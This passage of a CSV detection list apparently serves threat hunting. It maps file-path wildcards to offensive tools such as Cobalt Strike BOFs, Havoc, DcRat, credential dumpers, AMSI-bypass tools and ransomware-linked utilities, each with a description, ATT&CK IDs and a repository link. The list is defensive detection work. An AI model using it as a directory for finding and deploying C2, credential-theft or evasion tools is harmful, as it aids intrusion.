simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dbc2Loader*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/DCOM Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*/DCOMPotato.git*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/DeathStar/DeathStar.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DebugAmsi.git*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*/decrypt-chrome-passwords*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*/decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*/deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/defanger.go*","offensive_tool_keyword","Slackor","A Golang 
implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/defender-exclusions/*defender*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" 
+"*/defender-exclusions/*exclusion*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*/Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
+"*/DelegationBOF/*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"*/DelegationBOF/*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"*/deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z"
+"*/demo_bof.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Dendrobate.git*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through 
managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dent/*/Loader/Loader.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/Dent/Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/Dent/Loader*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/DesertFox/archive/*.zip*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*/detail/kali-linux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect-hooks.c*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/detect-hooks.cna*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/detect-hooks.h*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 